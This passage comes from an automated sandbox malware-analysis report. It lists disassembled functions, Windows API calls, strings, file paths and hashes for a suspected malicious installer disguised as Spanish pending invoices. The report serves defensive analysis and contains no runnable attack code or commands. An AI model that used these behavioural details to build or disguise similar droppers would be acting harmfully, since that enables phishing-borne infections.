                                  • API ID: Global$Free$Alloc
                                  • String ID:
                                  • API String ID: 1780285237-0
                                  • Opcode ID: f97498987787d6110dfc24f47e3338369d6197ae8ba0d85486d962a25cceed8a
                                  • Instruction ID: c3039f77c7dac78a3a0fa6f406ccb0f6aa4ed6319b9546a6f887c749cbb59f28
                                  • Opcode Fuzzy Hash: f97498987787d6110dfc24f47e3338369d6197ae8ba0d85486d962a25cceed8a
                                  • Instruction Fuzzy Hash: 2831F232204289DFE72E9F65C844FAAB7FAFB46311F20052DF40AE6290D731D545CBA9
                                  Function 734710C7 Relevance: 8.9, APIs: 7, Instructions: 162memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 7347116B
                                  • GlobalFree.KERNEL32(00000000), ref: 734711AE
                                  • GlobalFree.KERNEL32(00000000), ref: 734711CD
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 734711E6
                                  • GlobalFree.KERNEL32 ref: 7347125C
                                  • GlobalFree.KERNEL32(?), ref: 734712A7
                                  • GlobalFree.KERNEL32(00000000), ref: 734712BF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  • Associated: 00000000.00000002.2272001648.0000000073470000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.2272120564.0000000073474000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.2272201541.0000000073476000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73470000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Global$Free$Alloc
                                  • String ID:
                                  • API String ID: 1780285237-0
                                  • Opcode ID: 20e716707784ef3475580941fedd54a29e78dd9b17de3f222bf74e279f4d8f26
                                  • Instruction ID: 2814b41caad434e3dd6633424e2fbca5e1bd667d3bd4217f866527d00ce33dfa
                                  • Opcode Fuzzy Hash: 20e716707784ef3475580941fedd54a29e78dd9b17de3f222bf74e279f4d8f26
                                  • Instruction Fuzzy Hash: 2A519FB2500301DFD718EF69C941BAA77F8FB48204B24056EE94AEB390E635E901CB99
                                  Function 73472049 Relevance: 7.6, APIs: 5, Instructions: 129memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GlobalFree.KERNEL32(00000000), ref: 734721BF
                                    • Part of subcall function 734712E1: lstrcpynW.KERNEL32(00000000,?,7347156A,?,734711C4,-000000A0), ref: 734712F1
                                  • GlobalAlloc.KERNEL32(00000040), ref: 7347212C
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 7347214C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  • Associated: 00000000.00000002.2272001648.0000000073470000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.2272120564.0000000073474000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.2272201541.0000000073476000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73470000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                  • String ID:
                                  • API String ID: 4216380887-0
                                  • Opcode ID: 19906d973baa7389e1b0f76d1ae3f10f1024ce5b450b3e53bbf84f158e051831
                                  • Instruction ID: 7df0d6916f5f63571c1caaaf332951c8cf6adfa1667d714552eebdc287506bff
                                  • Opcode Fuzzy Hash: 19906d973baa7389e1b0f76d1ae3f10f1024ce5b450b3e53bbf84f158e051831
                                  • Instruction Fuzzy Hash: B941F572505389EFD31DAF24C844BEA77F8FB05340F48423DEA59AA249DB709581CAF8
                                  Function 00401EEA Relevance: 7.6, APIs: 5, Instructions: 74windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetDlgItem.USER32(?,?), ref: 00401F03
                                  • GetClientRect.USER32(00000000,?), ref: 00401F4D
                                  • LoadImageW.USER32(00000000,?,00000100,?,?,00000100), ref: 00401F82
                                  • SendMessageW.USER32(00000000,00000172,00000100,00000000), ref: 00401F92
                                  • DeleteObject.GDI32(00000000), ref: 00401FA1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                  • String ID:
                                  • API String ID: 1849352358-0
                                  • Opcode ID: 7f9423f384d93fc0e3e6fbc7cac958838f77b0a9d1a07732a5146b80b1a3c62d
                                  • Instruction ID: a1357e6e01c620789306e575287b66343fc6a42a857d7aaea03cc6a10a526d0d
                                  • Opcode Fuzzy Hash: 7f9423f384d93fc0e3e6fbc7cac958838f77b0a9d1a07732a5146b80b1a3c62d
                                  • Instruction Fuzzy Hash: 1C21B6726093029FD340DF64DE84A6BB7E8EB88304F04093EF985E62A1D778D840DB59
                                  Function 00401FB8 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetDC.USER32 ref: 00401FB9
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401FD0
                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401FD8
                                  • ReleaseDC.USER32(?,00000000), ref: 00401FEB
                                    • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00010480,?,?,?,00000000,?,?), ref: 0040604B
                                  • CreateFontIndirectW.GDI32(0040C8C8), ref: 00402037
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: CapsCreateDeviceFontIndirectReleaselstrcat
                                  • String ID:
                                  • API String ID: 4253744674-0
                                  • Opcode ID: 9f2a315a86747fca2e42ee02dfd95963893f875b0ab85644b2b496c98eb1a616
                                  • Instruction ID: a293f1e503c12f3834b95d63be9809c732b55947eac1385e5f26d009a2b4f9be
                                  • Opcode Fuzzy Hash: 9f2a315a86747fca2e42ee02dfd95963893f875b0ab85644b2b496c98eb1a616
                                  • Instruction Fuzzy Hash: 5401D473144780EFD300BBB49E8AA563BE8EB55706F10893EF685B71E1C9784109CB2D
                                  Function 73471F7B Relevance: 7.5, APIs: 5, Instructions: 38memorylibraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,73472B4C,00000000,00000808), ref: 73471F8C
                                  • GlobalAlloc.KERNEL32(00000040,00000000), ref: 73471F97
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 73471FAB
                                  • GetProcAddress.KERNEL32(?,00000000), ref: 73471FB6
                                  • GlobalFree.KERNEL32(00000000), ref: 73471FBF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  • Associated: 00000000.00000002.2272001648.0000000073470000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.2272120564.0000000073474000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.2272201541.0000000073476000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73470000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                  • String ID:
                                  • API String ID: 1148316912-0
                                  • Opcode ID: bb5a570b231d4a07e075014bf60185d4b826c753c16c9779b52e8e26425e1876
                                  • Instruction ID: 42ca6b397932c40303a73f6fb6673f93282cb34ea0768f8685259d0e3b75da73
                                  • Opcode Fuzzy Hash: bb5a570b231d4a07e075014bf60185d4b826c753c16c9779b52e8e26425e1876
                                  • Instruction Fuzzy Hash: E0F0C733108168BBC6142AE7DC0CE677EACEB8B7FDF160619F61DE12A0C66264008771
                                  Function 0040553B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlenW.KERNEL32(004211D0,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF,004211D0,?,?,?,?,?), ref: 004055FA
                                  • wsprintfW.USER32 ref: 00405607
                                  • SetDlgItemTextW.USER32(?,004211D0), ref: 0040561E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: ItemTextlstrlenwsprintf
                                  • String ID: %u.%u%s%s
                                  • API String ID: 3540041739-3551169577
                                  • Opcode ID: 1657763a395a501c771c527054f82eb2be7fb15598214c574ca57117f0c03a97
                                  • Instruction ID: 55cf9957bdbe08eeb8051450228c2b429c3200e40720c4f5a9b0f695fa8f14cf
                                  • Opcode Fuzzy Hash: 1657763a395a501c771c527054f82eb2be7fb15598214c574ca57117f0c03a97
                                  • Instruction Fuzzy Hash: 902106737003142FD720A9799C81FAB7289CBC5364F01473EFE6AF71D1E979581885A5
                                  Function 00401DBA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,?,?,?), ref: 00401E2C
                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00401E48
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: MessageSend$Timeout
                                  • String ID: !
                                  • API String ID: 1777923405-2657877971
                                  • Opcode ID: 717c05464dbdde1d43877d7e05f7376ad78b7270f4b2221d83dfb1c24934849a
                                  • Instruction ID: 49af8de353e46cf11236f791407a5cbcba9ae5af57995df827a2b81b7b260957
                                  • Opcode Fuzzy Hash: 717c05464dbdde1d43877d7e05f7376ad78b7270f4b2221d83dfb1c24934849a
                                  • Instruction Fuzzy Hash: 44212471209301AFE714AF21C846A2FBBE8EF84755F00093FF585A21E0C6B98D01CA5A
                                  Function 73471F1E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfW.USER32 ref: 73471F51
                                  • lstrcpyW.KERNEL32(?,error,00001018,73471765,00000000,?), ref: 73471F71
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  • Associated: 00000000.00000002.2272001648.0000000073470000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.2272120564.0000000073474000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.2272201541.0000000073476000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73470000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: lstrcpywsprintf
                                  • String ID: callback%d$error
                                  • API String ID: 2408954437-1307476583
                                  • Opcode ID: c70edf638ef40ad2a92b6e1d63cc9bf7b63339d127b02cd7c95c24e083765e37
                                  • Instruction ID: 266daff9c57382279d53ef58d5acbf6249a58419b9a1e866ded5b3b0405c9b47
                                  • Opcode Fuzzy Hash: c70edf638ef40ad2a92b6e1d63cc9bf7b63339d127b02cd7c95c24e083765e37
                                  • Instruction Fuzzy Hash: 82F05835204160AFD30C8B08D948FFA73B9EF89314F1981A8FC5A9B342C770AC418B99
                                  Function 00406531 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403C9E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406537
                                  • CharPrevW.USER32(?,00000000), ref: 00406542
                                  • lstrcatW.KERNEL32(?,004082B0), ref: 00406554
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406531
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrcatlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 2659869361-823278215
                                  • Opcode ID: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                  • Instruction ID: cc5554a2ad12a3b2ce5c355aa705355a4eb5105ff62047e1dcc734cc64aad723
                                  • Opcode Fuzzy Hash: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                  • Instruction Fuzzy Hash: B6D05E31102924AFC2026B58AE08D9B77ACFF46301301406EFAC2B3160CB745D5287ED
                                  Function 73471CC7 Relevance: 6.2, APIs: 4, Instructions: 209COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  • Associated: 00000000.00000002.2272001648.0000000073470000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.2272120564.0000000073474000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.2272201541.0000000073476000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73470000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: FreeGlobal$__alldvrm
                                  • String ID:
                                  • API String ID: 482422042-0
                                  • Opcode ID: 5a18ad99abb5c67aab769a9765d9200d5677d663218ee8280ec199a82a9d048d
                                  • Instruction ID: 53ac4e59fc73c23ca58e23a3c40cdad3aec6ad407019952da1e9b38b82f3673f
                                  • Opcode Fuzzy Hash: 5a18ad99abb5c67aab769a9765d9200d5677d663218ee8280ec199a82a9d048d
                                  • Instruction Fuzzy Hash: 115108326143458FD31E9E7589807FA76FAEBC8200B18492DE057D3384E7A1E986869A
                                  Function 0040285F Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 70stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll), ref: 004028B9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: lstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsnC132.tmp$C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll
                                  • API String ID: 1659193697-492866800
                                  • Opcode ID: 8dbcb2fd7b217228523bb32d9577dfde9e670be5aaf231835310540875a17a73
                                  • Instruction ID: 87e4a89a1644b821f0af8cb1a7976e90618d12837afc66c1e862d8435416238a
                                  • Opcode Fuzzy Hash: 8dbcb2fd7b217228523bb32d9577dfde9e670be5aaf231835310540875a17a73
                                  • Instruction Fuzzy Hash: C7112676A543006BD310BB618A89A2BB7D4AF84314F11453FF545B31C1D7BC980687AF
                                  Function 00402077 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00405D15: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00000000,?,?), ref: 00405D47
                                    • Part of subcall function 00405D15: lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00000000,?,?), ref: 00405D59
                                    • Part of subcall function 00405D15: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00000000,?,?), ref: 00405D74
                                    • Part of subcall function 00405D15: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll), ref: 00405D8C
                                    • Part of subcall function 00405D15: SendMessageW.USER32(00010480), ref: 00405DB3
                                    • Part of subcall function 00405D15: SendMessageW.USER32(00010480,0000104D,00000000,?), ref: 00405DCE
                                    • Part of subcall function 00405D15: SendMessageW.USER32(00010480,00001013,00000000,00000000), ref: 00405DDB
                                    • Part of subcall function 004069CE: ShellExecuteExW.SHELL32(?), ref: 004069DD
                                    • Part of subcall function 004064EF: WaitForSingleObject.KERNEL32(?,00000064), ref: 004064F9
                                    • Part of subcall function 004064EF: GetExitCodeProcess.KERNEL32(?,?), ref: 00406523
                                  • CloseHandle.KERNEL32(?,?), ref: 00402110
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll, xrefs: 00402098
                                  • @, xrefs: 004020F2
                                  • C:\Users\user\AppData\Local\Temp\fanin\Leflet, xrefs: 004020D1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrlen$CloseCodeExecuteExitHandleObjectProcessShellSingleTextWaitWindowlstrcat
                                  • String ID: @$C:\Users\user\AppData\Local\Temp\fanin\Leflet$C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll
                                  • API String ID: 4079680657-4143260430
                                  • Opcode ID: b3f635e0ff2294aada5878f9b4cee8023eac3de101f72fe104a431beeca66540
                                  • Instruction ID: 1a2f5228193f18700cea608b7af5492b6fd1c87105d587b586e39d0dc9a83391
                                  • Opcode Fuzzy Hash: b3f635e0ff2294aada5878f9b4cee8023eac3de101f72fe104a431beeca66540
                                  • Instruction Fuzzy Hash: 3C118C71A483809BC710AFA2C94561ABBE9BFC4745F40493EF595A72D1DBBC8805CB4A
                                  Function 00403364 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                  Download Yara Rule
                                  APIs
                                  • DestroyWindow.USER32(00000000,00403554), ref: 00403375
                                  • GetTickCount.KERNEL32 ref: 00403394
                                  • CreateDialogParamW.USER32(0000006F,00000000,0040362A,00000000), ref: 004033B3
                                  • ShowWindow.USER32(00000000,00000005), ref: 004033C1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                  • String ID:
                                  • API String ID: 2102729457-0
                                  • Opcode ID: 4a7b031ca6bcbd07d04e4791083f97fcd863d0c0ea14b4434ac483fd79bb7cb0
                                  • Instruction ID: 05fd0e373085f508408529d976a5f5643121ad856ee530bb797c10a8200a5ccc
                                  • Opcode Fuzzy Hash: 4a7b031ca6bcbd07d04e4791083f97fcd863d0c0ea14b4434ac483fd79bb7cb0
